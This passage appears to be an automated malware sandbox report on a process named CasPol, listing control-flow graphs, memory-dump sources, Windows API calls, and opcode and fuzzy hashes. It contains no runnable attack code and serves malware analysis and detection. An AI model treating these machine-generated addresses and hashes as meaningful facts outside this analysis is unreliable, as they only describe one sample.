151b4b4 11143->11426 11427 1047191 call 151b744 11143->11427 11147 1047197-10471bd 11430 10471bf call 151b570 11147->11430 11431 10471bf call 151b580 11147->11431 11432 10471bf call 151b4b4 11147->11432 11433 10471bf call 151b744 11147->11433 11151 10471c5-10471eb 11444 10471ed call 151b570 11151->11444 11445 10471ed call 151b580 11151->11445 11446 10471ed call 151b4b4 11151->11446 11447 10471ed call 151b744 11151->11447 11155 10471f3-104725f LdrInitializeThunk 11156 1047265-1047289 11155->11156 11157 1047588 11155->11157 11162 10473e2-1047406 11156->11162 11163 104728f 11156->11163 11453 1047588 call 151bb50 11157->11453 11454 1047588 call 151bab0 11157->11454 11455 1047588 call 151baa0 11157->11455 11159 104758e-10476c6 11456 10476c6 call 151ccf0 11159->11456 11457 10476c6 call 151cc90 11159->11457 11171 104740c-104740e 11162->11171 11172 1047408 11162->11172 11163->11162 11164 1047295-10473dd 11163->11164 11164->11157 11176 1047415-104743f 11171->11176 11174 1047410 11172->11174 11175 104740a 11172->11175 11174->11176 11175->11171 11186 1047445-1047447 11176->11186 11187 1047441 11176->11187 11191 104744e-1047454 11186->11191 11189 1047443 11187->11189 11190 1047449 11187->11190 11189->11186 11190->11191 11191->11157 11193 104745a-104755d 11191->11193 11193->11157 11203 10476cc-1047798 11434 1047798 call 151da32 11203->11434 11435 1047798 call 151da88 11203->11435 11226 104779e-104782c 11460 104782c call 151dd50 11226->11460 11461 104782c call 151da32 11226->11461 11462 104782c call 151e2b7 11226->11462 11463 104782c call 151dce6 11226->11463 11464 104782c call 151da88 11226->11464 11465 104782c call 151df98 11226->11465 11466 104782c call 151e158 11226->11466 11242 1047832-10478b4 11422 10478b4 call 151e450 11242->11422 11423 10478b4 call 151e4b0 11242->11423 11255 10478ba-104793c 11436 104793c call 151ee90 11255->11436 11437 104793c call 151edec 11255->11437 11438 104793c call 151eeef 11255->11438 11261 1047942-1047986 11442 1047986 call 151ef50 11261->11442 11443 1047986 call 151efb0 11261->11443 11264 104798c-1047b40 11282 1047b46-1047b69 11264->11282 11283 1047e4b-1047e5c 11264->11283 11297 1047e33-1047e48 11282->11297 11298 1047b6f-1047be1 11282->11298 11286 10481c7-10481ce 11283->11286 11287 1047e62-1047e69 11283->11287 11290 10481d4-1048245 11286->11290 11291 1048250-104825a 11286->11291 11288 1047f02-1047f09 11287->11288 11289 1047e6f-1047ec3 11287->11289 11293 1047f0f-1048054 call 1045aa0 call 10456a8 11288->11293 11294 104807b-1048082 11288->11294 11339 1047ecf 11289->11339 11290->11291 11295 10482a0-10482b2 11291->11295 11296 104825c-1048299 11291->11296 11293->11286 11294->11286 11299 1048088-10481a8 call 1045aa0 call 10456a8 call 10456f0 11294->11299 11296->11295 11297->11283 11327 1047be7-1047bee 11298->11327 11328 1047e1b-1047e2d 11298->11328 11299->11286 11332 1047bf4-1047d12 11327->11332 11333 1047d17-1047d42 11327->11333 11328->11297 11328->11298 11332->11328 11333->11328 11338 1047d48-1047df0 11333->11338 11338->11328 11339->11286 11414->11139 11415->11139 11416->11139 11417->11139 11418->11143 11419->11143 11420->11143 11421->11143 11422->11255 11423->11255 11424->11147 11425->11147 11426->11147 11427->11147 11428->11115 11429->11115 11430->11151 11431->11151 11432->11151 11433->11151 11434->11226 11435->11226 11436->11261 11437->11261 11438->11261 11439->11118 11440->11118 11441->11118 11442->11264 11443->11264 11444->11155 11445->11155 11446->11155 11447->11155 11448->11121 11449->11121 11450->11125 11451->11125 11452->11125 11453->11159 11454->11159 11455->11159 11456->11203 11457->11203 11458->11128 11459->11128 11460->11242 11461->11242 11462->11242 11463->11242 11464->11242 11465->11242 11466->11242 11467->11135 11468->11135 11469->11135
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: c00d55234564782ae2eb9e1ffc52c6bccee1a7956c127eb737f7e2f6564bcfbe
                                                                                      • Instruction ID: be713bc6b1fbd7dd6634942e3f6914d81f4e421ba621314d95ba5e42b1952d5c
                                                                                      • Opcode Fuzzy Hash: c00d55234564782ae2eb9e1ffc52c6bccee1a7956c127eb737f7e2f6564bcfbe
                                                                                      • Instruction Fuzzy Hash: 6E3219B4A00224CFCB65DF64C98879DBBB6BF88305F5084EAD50AA3344DB359E91CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01046F70 Relevance: 2.0, APIs: 1, Instructions: 483libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 11470 1046f70-1046f96 11785 1046f96 call 151a290 11470->11785 11786 1046f96 call 151a2a0 11470->11786 11787 1046f96 call 151a6b0 11470->11787 11474 1046f9c-1046fdd 11794 1046fdd call 151a978 11474->11794 11795 1046fdd call 151a9d8 11474->11795 11477 1046fe3-104703a 11796 104703a call 151adf0 11477->11796 11797 104703a call 151aea0 11477->11797 11798 104703a call 151aeff 11477->11798 11481 1047040-1047084 11804 1047084 call 151af60 11481->11804 11805 1047084 call 151afc0 11481->11805 11484 104708a-1047105 11813 104710b call 151b4b4 11484->11813 11814 104710b call 151b3e8 11484->11814 11815 104710b call 151b388 11484->11815 11491 1047111-1047133 11816 1047135 call 151b570 11491->11816 11817 1047135 call 151b580 11491->11817 11818 1047135 call 151b4b4 11491->11818 11819 1047135 call 151b744 11491->11819 11495 104713b-1047161 11820 1047163 call 151b570 11495->11820 11821 1047163 call 151b580 11495->11821 11822 1047163 call 151b4b4 11495->11822 11823 1047163 call 151b744 11495->11823 11499 1047169-104718f 11772 1047191 call 151b570 11499->11772 11773 1047191 call 151b580 11499->11773 11774 1047191 call 151b4b4 11499->11774 11775 1047191 call 151b744 11499->11775 11503 1047197-10471bd 11776 10471bf call 151b570 11503->11776 11777 10471bf call 151b580 11503->11777 11778 10471bf call 151b4b4 11503->11778 11779 10471bf call 151b744 11503->11779 11507 10471c5-10471eb 11790 10471ed call 151b570 11507->11790 11791 10471ed call 151b580 11507->11791 11792 10471ed call 151b4b4 11507->11792 11793 10471ed call 151b744 11507->11793 11511 10471f3-104725f LdrInitializeThunk 11512 1047265-1047289 11511->11512 11513 1047588 11511->11513 11518 10473e2-1047406 11512->11518 11519 104728f 11512->11519 11799 1047588 call 151bb50 11513->11799 11800 1047588 call 151bab0 11513->11800 11801 1047588 call 151baa0 11513->11801 11515 104758e-10476c6 11802 10476c6 call 151ccf0 11515->11802 11803 10476c6 call 151cc90 11515->11803 11527 104740c-104740e 11518->11527 11528 1047408 11518->11528 11519->11518 11520 1047295-10473dd 11519->11520 11520->11513 11532 1047415-104743f 11527->11532 11530 1047410 11528->11530 11531 104740a 11528->11531 11530->11532 11531->11527 11542 1047445-1047447 11532->11542 11543 1047441 11532->11543 11547 104744e-1047454 11542->11547 11545 1047443 11543->11545 11546 1047449 11543->11546 11545->11542 11546->11547 11547->11513 11549 104745a-104755d 11547->11549 11549->11513 11559 10476cc-1047798 11780 1047798 call 151da32 11559->11780 11781 1047798 call 151da88 11559->11781 11582 104779e-104782c 11806 104782c call 151dd50 11582->11806 11807 104782c call 151da32 11582->11807 11808 104782c call 151e2b7 11582->11808 11809 104782c call 151dce6 11582->11809 11810 104782c call 151da88 11582->11810 11811 104782c call 151df98 11582->11811 11812 104782c call 151e158 11582->11812 11598 1047832-10478b4 11770 10478b4 call 151e450 11598->11770 11771 10478b4 call 151e4b0 11598->11771 11611 10478ba-104793c 11782 104793c call 151ee90 11611->11782 11783 104793c call 151edec 11611->11783 11784 104793c call 151eeef 11611->11784 11617 1047942-1047986 11788 1047986 call 151ef50 11617->11788 11789 1047986 call 151efb0 11617->11789 11620 104798c-1047b40 11638 1047b46-1047b69 11620->11638 11639 1047e4b-1047e5c 11620->11639 11653 1047e33-1047e48 11638->11653 11654 1047b6f-1047be1 11638->11654 11642 10481c7-10481ce 11639->11642 11643 1047e62-1047e69 11639->11643 11646 10481d4-1048245 11642->11646 11647 1048250-104825a 11642->11647 11644 1047f02-1047f09 11643->11644 11645 1047e6f-1047ec3 11643->11645 11649 1047f0f-1048054 call 1045aa0 call 10456a8 11644->11649 11650 104807b-1048082 11644->11650 11695 1047ecf 11645->11695 11646->11647 11651 10482a0-10482b2 11647->11651 11652 104825c-1048299 11647->11652 11649->11642 11650->11642 11655 1048088-10481a8 call 1045aa0 call 10456a8 call 10456f0 11650->11655 11652->11651 11653->11639 11683 1047be7-1047bee 11654->11683 11684 1047e1b-1047e2d 11654->11684 11655->11642 11688 1047bf4-1047d12 11683->11688 11689 1047d17-1047d42 11683->11689 11684->11653 11684->11654 11688->11684 11689->11684 11694 1047d48-1047df0 11689->11694 11694->11684 11695->11642 11770->11611 11771->11611 11772->11503 11773->11503 11774->11503 11775->11503 11776->11507 11777->11507 11778->11507 11779->11507 11780->11582 11781->11582 11782->11617 11783->11617 11784->11617 11785->11474 11786->11474 11787->11474 11788->11620 11789->11620 11790->11511 11791->11511 11792->11511 11793->11511 11794->11477 11795->11477 11796->11481 11797->11481 11798->11481 11799->11515 11800->11515 11801->11515 11802->11559 11803->11559 11804->11484 11805->11484 11806->11598 11807->11598 11808->11598 11809->11598 11810->11598 11811->11598 11812->11598 11813->11491 11814->11491 11815->11491 11816->11495 11817->11495 11818->11495 11819->11495 11820->11499 11821->11499 11822->11499 11823->11499
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 0326a7449ddba8ef01ab4facf89bd34f218bc663b1a87c854b973c6cb15d6b70
                                                                                      • Instruction ID: 23b75d6c0a0d070a9058eb0024bd28f4125cf36ea8dafd8f700b64ff6510d184
                                                                                      • Opcode Fuzzy Hash: 0326a7449ddba8ef01ab4facf89bd34f218bc663b1a87c854b973c6cb15d6b70
                                                                                      • Instruction Fuzzy Hash: 5D3219B4A00224CFCB65EF64C98879DBBB6BF88305F5084EAD50AA3344DB359E91CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01046FB7 Relevance: 2.0, APIs: 1, Instructions: 476libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 11824 1046fb7-1046fdd 12166 1046fdd call 151a978 11824->12166 12167 1046fdd call 151a9d8 11824->12167 11828 1046fe3-104703a 12124 104703a call 151adf0 11828->12124 12125 104703a call 151aea0 11828->12125 12126 104703a call 151aeff 11828->12126 11832 1047040-1047084 12127 1047084 call 151af60 11832->12127 12128 1047084 call 151afc0 11832->12128 11835 104708a-1047105 12138 104710b call 151b4b4 11835->12138 12139 104710b call 151b3e8 11835->12139 12140 104710b call 151b388 11835->12140 11842 1047111-1047133 12141 1047135 call 151b570 11842->12141 12142 1047135 call 151b580 11842->12142 12143 1047135 call 151b4b4 11842->12143 12144 1047135 call 151b744 11842->12144 11846 104713b-1047161 12145 1047163 call 151b570 11846->12145 12146 1047163 call 151b580 11846->12146 12147 1047163 call 151b4b4 11846->12147 12148 1047163 call 151b744 11846->12148 11850 1047169-104718f 12151 1047191 call 151b570 11850->12151 12152 1047191 call 151b580 11850->12152 12153 1047191 call 151b4b4 11850->12153 12154 1047191 call 151b744 11850->12154 11854 1047197-10471bd 12160 10471bf call 151b570 11854->12160 12161 10471bf call 151b580 11854->12161 12162 10471bf call 151b4b4 11854->12162 12163 10471bf call 151b744 11854->12163 11858 10471c5-10471eb 12168 10471ed call 151b570 11858->12168 12169 10471ed call 151b580 11858->12169 12170 10471ed call 151b4b4 11858->12170 12171 10471ed call 151b744 11858->12171 11862 10471f3-104725f LdrInitializeThunk 11863 1047265-1047289 11862->11863 11864 1047588 11862->11864 11869 10473e2-1047406 11863->11869 11870 104728f 11863->11870 12121 1047588 call 151bb50 11864->12121 12122 1047588 call 151bab0 11864->12122 12123 1047588 call 151baa0 11864->12123 11866 104758e-10476c6 12129 10476c6 call 151ccf0 11866->12129 12130 10476c6 call 151cc90 11866->12130 11878 104740c-104740e 11869->11878 11879 1047408 11869->11879 11870->11869 11871 1047295-10473dd 11870->11871 11871->11864 11883 1047415-104743f 11878->11883 11881 1047410 11879->11881 11882 104740a 11879->11882 11881->11883 11882->11878 11893 1047445-1047447 11883->11893 11894 1047441 11883->11894 11898 104744e-1047454 11893->11898 11896 1047443 11894->11896 11897 1047449 11894->11897 11896->11893 11897->11898 11898->11864 11900 104745a-104755d 11898->11900 11900->11864 11910 10476cc-1047798 12155 1047798 call 151da32 11910->12155 12156 1047798 call 151da88 11910->12156 11933 104779e-104782c 12131 104782c call 151dd50 11933->12131 12132 104782c call 151da32 11933->12132 12133 104782c call 151e2b7 11933->12133 12134 104782c call 151dce6 11933->12134 12135 104782c call 151da88 11933->12135 12136 104782c call 151df98 11933->12136 12137 104782c call 151e158 11933->12137 11949 1047832-10478b4 12149 10478b4 call 151e450 11949->12149 12150 10478b4 call 151e4b0 11949->12150 11962 10478ba-104793c 12157 104793c call 151ee90 11962->12157 12158 104793c call 151edec 11962->12158 12159 104793c call 151eeef 11962->12159 11968 1047942-1047986 12164 1047986 call 151ef50 11968->12164 12165 1047986 call 151efb0 11968->12165 11971 104798c-1047b40 11989 1047b46-1047b69 11971->11989 11990 1047e4b-1047e5c 11971->11990 12004 1047e33-1047e48 11989->12004 12005 1047b6f-1047be1 11989->12005 11993 10481c7-10481ce 11990->11993 11994 1047e62-1047e69 11990->11994 11997 10481d4-1048245 11993->11997 11998 1048250-104825a 11993->11998 11995 1047f02-1047f09 11994->11995 11996 1047e6f-1047ec3 11994->11996 12000 1047f0f-1048054 call 1045aa0 call 10456a8 11995->12000 12001 104807b-1048082 11995->12001 12046 1047ecf 11996->12046 11997->11998 12002 10482a0-10482b2 11998->12002 12003 104825c-1048299 11998->12003 12000->11993 12001->11993 12006 1048088-10481a8 call 1045aa0 call 10456a8 call 10456f0 12001->12006 12003->12002 12004->11990 12034 1047be7-1047bee 12005->12034 12035 1047e1b-1047e2d 12005->12035 12006->11993 12039 1047bf4-1047d12 12034->12039 12040 1047d17-1047d42 12034->12040 12035->12004 12035->12005 12039->12035 12040->12035 12045 1047d48-1047df0 12040->12045 12045->12035 12046->11993 12121->11866 12122->11866 12123->11866 12124->11832 12125->11832 12126->11832 12127->11835 12128->11835 12129->11910 12130->11910 12131->11949 12132->11949 12133->11949 12134->11949 12135->11949 12136->11949 12137->11949 12138->11842 12139->11842 12140->11842 12141->11846 12142->11846 12143->11846 12144->11846 12145->11850 12146->11850 12147->11850 12148->11850 12149->11962 12150->11962 12151->11854 12152->11854 12153->11854 12154->11854 12155->11933 12156->11933 12157->11968 12158->11968 12159->11968 12160->11858 12161->11858 12162->11858 12163->11858 12164->11971 12165->11971 12166->11828 12167->11828 12168->11862 12169->11862 12170->11862 12171->11862
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 0a767d978392d7b0a558351be57d7bc623fb4a24eeaa46c12a288f01868d2a3f
                                                                                      • Instruction ID: 4fadc9d4b1d735dc9337f9a4f107b5cace7ff4bdd1d144dba5a9b3fe9a4056e3
                                                                                      • Opcode Fuzzy Hash: 0a767d978392d7b0a558351be57d7bc623fb4a24eeaa46c12a288f01868d2a3f
                                                                                      • Instruction Fuzzy Hash: 042218B4A00228CFCB65DF64C98879DBBB6BF88305F5084E9D50AA3344DB359E91CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01047014 Relevance: 2.0, APIs: 1, Instructions: 465libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: e628d7858cdf3716a81e7e9ffa577e33bc709a12bce72621250041c715936f36
                                                                                      • Instruction ID: e37c33cfeb6c7355736fe36efc58e5f505a4625111126b9b6bc0bdb274e78b81
                                                                                      • Opcode Fuzzy Hash: e628d7858cdf3716a81e7e9ffa577e33bc709a12bce72621250041c715936f36
                                                                                      • Instruction Fuzzy Hash: E22217B4A00228CFCB64EF64C98879DBBB6BF88205F5084E9D50AA3344DB359E95CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0104705B Relevance: 2.0, APIs: 1, Instructions: 458libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 6156fa723bc674ea70f16d458ddf313d9f01c08f744c149f6b8fc5f729d1ae60
                                                                                      • Instruction ID: 8971ce2e90aef4b86a7a40d33aace85802f9ea09d9a6a05993dbac8a47383058
                                                                                      • Opcode Fuzzy Hash: 6156fa723bc674ea70f16d458ddf313d9f01c08f744c149f6b8fc5f729d1ae60
                                                                                      • Instruction Fuzzy Hash: FD2207B4A00228CFCB64EF64C98879DBBB6BF88205F5084E9D50AA3344DF359E95CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 010470A5 Relevance: 2.0, APIs: 1, Instructions: 451libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 724be651c6e705d095df33ef9046337b9d766722f8e727c8e47d4b6170c15be4
                                                                                      • Instruction ID: a0a7aee1f6768c2bc11cb87e2d61695306b2e03c7098f5a3779ddfa59979acba
                                                                                      • Opcode Fuzzy Hash: 724be651c6e705d095df33ef9046337b9d766722f8e727c8e47d4b6170c15be4
                                                                                      • Instruction Fuzzy Hash: 4022F6B4A00228CFCB64EF64C98879DBBB6BF88205F5084E9D50AA3344DF359E95CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01518418 Relevance: 1.7, APIs: 1, Instructions: 180libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928440351.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1510000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 2954cd80c428d4d831dc47697e4bf6b8603c30d170b6978359e956e31b34984d
                                                                                      • Instruction ID: a8b8c33d268ecd3e6fed5c9407c50d4ff1053de1953e09035bf9c7a0e4375c33
                                                                                      • Opcode Fuzzy Hash: 2954cd80c428d4d831dc47697e4bf6b8603c30d170b6978359e956e31b34984d
                                                                                      • Instruction Fuzzy Hash: 5C619334A1021ADFEB25DFB4D4887AE7BF2BF44345F118828D516AB398DF389845CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0151A978 Relevance: 1.7, APIs: 1, Instructions: 174libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928440351.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1510000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 62913757a791b8176b3bbf4930595677915092e51b1e8536a5db5376e2c29f73
                                                                                      • Instruction ID: 79c5de092ae8b6e8cc8f921b342e752125098a080428b69e3948dfcb4ad395e6
                                                                                      • Opcode Fuzzy Hash: 62913757a791b8176b3bbf4930595677915092e51b1e8536a5db5376e2c29f73
                                                                                      • Instruction Fuzzy Hash: 0951F031B053459FDB02DBB4C888AEE77F6BF89204F04856AE116DB296EB74DC05CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0151A9D8 Relevance: 1.6, APIs: 1, Instructions: 148libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928440351.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1510000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 7b78e8bee5373f12d9544faec3b1d5ab3bd46ea6f42880b3727470210715889f
                                                                                      • Instruction ID: 82b16d388ad91894c8d35cc9d249f5636fc314a115a94ff0cd9f274468122a1b
                                                                                      • Opcode Fuzzy Hash: 7b78e8bee5373f12d9544faec3b1d5ab3bd46ea6f42880b3727470210715889f
                                                                                      • Instruction Fuzzy Hash: 7751C375B003099FDB05DBB4C888AAEB7B6BF88204F048929D5169B395EF74EC05CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 1D7A67ED Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1D7A690A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30950946220.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1d7a0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateWindow
                                                                                      • String ID:
                                                                                      • API String ID: 716092398-0
                                                                                      • Opcode ID: b79262392925f4dfd33e46c7f2bdbe515db5863a10b670cf811e25e593e162af
                                                                                      • Instruction ID: bca8dc6d6474cb2318f7fa94f04a796cc7d10634c9d0c85d1725e7792315afb9
                                                                                      • Opcode Fuzzy Hash: b79262392925f4dfd33e46c7f2bdbe515db5863a10b670cf811e25e593e162af
                                                                                      • Instruction Fuzzy Hash: 4851D2B5C00309DFDF14CF99C884ADEBBB5BF88310F25822AE815AB210D7759945CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 011125A7 Relevance: 1.6, APIs: 1, Instructions: 114threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • TerminateThread.KERNEL32(6B396C6F,D9A09985), ref: 0111263C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926261275.0000000001112000.00000040.00000400.00020000.00000000.sdmp, Offset: 01112000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1112000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: TerminateThread
                                                                                      • String ID:
                                                                                      • API String ID: 1852365436-0
                                                                                      • Opcode ID: 48a4bb1b8a5b674a119ada6d3adbf7d39e80f03258f37b97f4ad20b14f5f34a7
                                                                                      • Instruction ID: 3f4abdb88e691fca68fe4363d8ae0d789ae9471055ebf5493b360f2303997ffd
                                                                                      • Opcode Fuzzy Hash: 48a4bb1b8a5b674a119ada6d3adbf7d39e80f03258f37b97f4ad20b14f5f34a7
                                                                                      • Instruction Fuzzy Hash: 5F312836204701CFEB289F58A4A8BA2F3A2EF907B4F75467BEC05C7095D7369081CA46
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 1D7A67F8 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1D7A690A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30950946220.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1d7a0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateWindow
                                                                                      • String ID:
                                                                                      • API String ID: 716092398-0
                                                                                      • Opcode ID: 5806b2ca0a4c11786f4c000f9d814b0c6dbf398af4aa6e54931e8206056628d8
                                                                                      • Instruction ID: b9a6abea6606dca1f381d7fcc72ab0122e816edf23568f6f3926bfb60ea36220
                                                                                      • Opcode Fuzzy Hash: 5806b2ca0a4c11786f4c000f9d814b0c6dbf398af4aa6e54931e8206056628d8
                                                                                      • Instruction Fuzzy Hash: B641C2B1D00309DFDF14CF99C884ADEBBB5BF88310F25822AE819AB250D775A945CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0151BF39 Relevance: 1.6, APIs: 1, Instructions: 111registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 0151C04C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928440351.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1510000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: Open
                                                                                      • String ID:
                                                                                      • API String ID: 71445658-0
                                                                                      • Opcode ID: 7e3835a7e2b24a9fc33b42a6202ad5681bd84a5106e3881db9e99c3eae965d5d
                                                                                      • Instruction ID: 54b8d7f0134802e0c30b4b46d3f5e3c8f727209f2e88d28e0903bf8ea059fb3c
                                                                                      • Opcode Fuzzy Hash: 7e3835a7e2b24a9fc33b42a6202ad5681bd84a5106e3881db9e99c3eae965d5d
                                                                                      • Instruction Fuzzy Hash: 024156B0E043498FEB11CFA9C548A9EFFF1BF49304F15816AE908AB356C7B59845CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 1D7AA610 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1D7AA5D7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30950946220.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1d7a0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: a0fea91e135cbe5f5fd8b6a47150f6cb666f7cfeb640b2ba73c71618a029257a
                                                                                      • Instruction ID: 0a72403e87895f3c26b983bca6f2cb7da747f3925371eaee9123c818c8f4eff4
                                                                                      • Opcode Fuzzy Hash: a0fea91e135cbe5f5fd8b6a47150f6cb666f7cfeb640b2ba73c71618a029257a
                                                                                      • Instruction Fuzzy Hash: 96418F78640395AFE7009FA8D4E5B7A3BB5F749721F108259E9058B3E1CB7A0952CF21
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 1D7AA144 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 1D7AB4D9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30950946220.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
